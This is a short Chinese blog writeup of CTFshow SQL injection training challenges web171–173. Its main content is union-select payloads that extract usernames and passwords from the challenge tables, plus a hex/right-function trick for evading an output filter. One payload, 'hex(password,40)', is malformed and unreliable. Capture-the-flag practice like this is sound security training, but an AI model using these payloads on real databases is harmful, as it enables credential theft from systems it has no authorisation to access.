0
点赞
收藏
分享

微信扫一扫

[CTFSHOW]SQL注入训练

小暴龙要抱抱 2022-10-27 阅读 81
sql注入16进制编程语言


文章目录

  • ​​web171​​
  • ​​web172​​
  • ​​web173​​
  • ​​方法一​​
  • ​​方法二​​

web171

普通的sql注入,不做讲解
payload:​​​1' union select id,username,password from ctfshow_user1 -- -​

web172

普通的sql注入,不做讲解
payload:​​​1' union select id,username,password from ctfshow_user2 -- -​

web173

方法一

过滤了带有​​flag​​​的输出,可以转换为16进制输出
​​​1' union select id,hex(username),hex(password,40) from ctfshow_user3 -- -​

方法二

用​​right​​​函数
​​​1' union select id,hex(username),right(password,40) from ctfshow_user3 -- -​


举报

相关推荐

ctfshow SQL注入Web171-172

web安全

[SQL注入]CTFSHOW-----WEB6(空格绕过)

数据抓包表名虚拟化云计算

ctfshow-web入门-sql注入-web248-UDF 注入

java开发语言

ctfshow sql注入 web171-web253 wp

sql信息安全

CTFshow sql注入 上篇(web171-220)更新中

sqlweb安全安全

【CTF Web】CTFShow web5 Writeup(SQL注入+PHP+位运算)

dockernginx容器

【CTF Web】CTFShow web6 Writeup(SQL注入+PHP+位运算)

图像处理opencv人工智能

ctfshow sql171-179

bugopencvmatplotlib图像处理

SQL注入Cookie注入

网络安全sql安全

SQL注入Update注入

网络安全安全sql
0 条评论